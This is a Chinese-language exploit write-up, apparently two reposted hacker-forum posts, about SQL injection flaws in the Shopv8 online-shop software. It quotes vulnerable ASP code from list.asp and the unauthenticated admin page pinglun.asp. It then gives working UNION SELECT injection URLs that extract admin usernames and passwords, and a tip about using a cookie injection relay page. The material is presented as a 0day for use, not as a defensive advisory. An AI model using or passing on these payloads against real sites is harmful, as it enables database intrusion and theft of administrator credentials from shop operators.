邯郸学步,shopv8的注入漏洞
邯郸学步,shopv8的注入漏洞
文章:流浪的风 blog:http://www.st999.cn/blog
邯郸学步,按图索骥,大家不要笑了。。。
感谢闷豆,k4shifz,寒心冰剑……几位黑阔的帮忙。。。。
程序 :shopv8商城系统10.84
下载:http://www.codepub.com/software/view-software-7161.html
漏洞文件:list.asp
部分源码:
<%if IsNumeric(request.QueryString("id"))=False then
response.write("<script>alert(""非法访问!"");location.href=""index.asp"";</script>")
response.end
end if
dim id
id=request.QueryString("id")
if not isinteger(id) then
response.write"<script>alert(""非法访问!"");location.href=""index.asp"";</script>"
end if%>
<%dim bookid,action
bookid=request.QueryString("id")
action=request.QueryString("action")
if action="save" then
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from shop_pinglun",conn,1,3
rs.addnew
rs("bookid")=bookid
rs("pingji")=request("pingji")
rs("pinglunname")=HTMLEncode2(trim(request("pinglunname")))
rs("pingluntitle")=HTMLEncode2(trim(request("pingluntitle")))
rs("pingluncontent")=HTMLEncode2(trim(request("pingluncontent")))
rs("ip")=Request.servervariables("REMOTE_ADDR")
rs("pinglundate")=now()
rs("shenhe")=0
rs.update
rs.close
set rs=nothing
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from shop_books where bookid="&bookid,conn,1,3
rs("pingji")=rs("pingji")+1
rs("pingjizong")=rs("pingjizong")+request("pingji")
rs.update
rs.close
set rs=nothing
response.Write "<script language=javascript>alert('您的评论已成功提交!');history.go(-1);</script>"
response.End
end if
%>
<!--#include file="webtop.asp"-->
<TABLE cellSpacing=0 cellPadding=0 width=772 align=center border=0>
<TBODY>
<TR>
<td width="1" background="image/images/bgbg.gif"></td>
<TD class=b vAlign=top align=left width=770><table width="770" align="center" border="0" cellspacing="0" cellpadding="0" class="table-zuoyou" bordercolor="#CCCCCC">
<tr>
<td width="178" valign="top" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><!--#include file="history.asp"-->
<!--#include file="gouwucheinfo.asp"-->
<!--#include file="xiaoshourank.asp"-->
</td>
<td valign="top" class="table-zuo" align="center" bgcolor="#FFFFFF" bordercolor="#FFFFFF"><%set rs=server.createobject("adodb.recordset")
rs.open "select * from shop_books where bookid="&request("id"),conn,1,3
if rs.recordcount=0 then
%>
其中,if not isinteger(id) then
response.write"<script>alert(""非法访问!"");location.href=""index.asp"";</script>"
没有以response.end结束,那么request("id") ,我们也可以使用cookies给id赋值,那么注入就产生了。
只要把IE的安全设置设到最高,就可以阻止网页跳转到index.asp页面了。
(不知道这里的这样分析对不对,请大家指点)
利用方法:
先把安全设置设为最高,
注入点 http://127.0.0.1:99/list.asp?id=322
直接用注入中转器生成个页面,暴用户名和密码,如图
http://127.0.0.1:99/jmCook.asp?jmdcw=322%20and%201=2%20union%20select%
201,2,3,4,5,6,7,8,9,10,11,12,13,username,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,
34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53%20from%20admin
Shopv8商城系统 v10.48 0day漏洞
发布作者:Lan3a
影响版本: Shopv8商城系统 v10.48
漏洞描述: pinglun.asp页面存在SQL注入
Author:Lan3a
转载请注明出处:http://blog.cfyhack.cn/
前台所有程序都加了防注入代码的,所以我就不去看了。
直接翻后台的看,先看有没有不需要验证的,运气很不错,找到了。
pinglun.asp这个文件。
代码如下:
<%dim bookid,action
pinglunid=request.QueryString("id") 直接提交
action=request.QueryString("action")
if action="save" then
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from shop_pinglun where pinglunid="&pinglunid,conn,1,3
rs("huifu")=HTMLEncode2(trim(request("huifu")))
rs("huifudate")=now()
rs.update
rs.close
set rs=nothing
response.write "<script language=javascript>alert(’您的回复已成功提交!!’);history.go(-1);</script>"
response.End
end if
%>
<table class="tableBorder" width="90%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#FFFFFF">
<tr>
<td align="center" background="../images/admin_bg_1.gif"><b><font color="#ffffff">发表评论</font></b></td>
</tr>
<tr>
<form name="pinglunform" method="post" action="pinglun.asp?action=save&id=<%=pinglunid%>">
<td >
<%set rs=server.CreateObject("adodb.recordset")
rs.open "select * from shop_pinglun where pinglunid="&pinglunid,conn,1,3 直接传入查询
%>
下面直接贴 利用方法了:
http://localhost/admin/pinglun.asp?id=1%20and%2201=2%20union%20select%201,2,3,4,username,password,7,8,9,10,11%20from%20admin
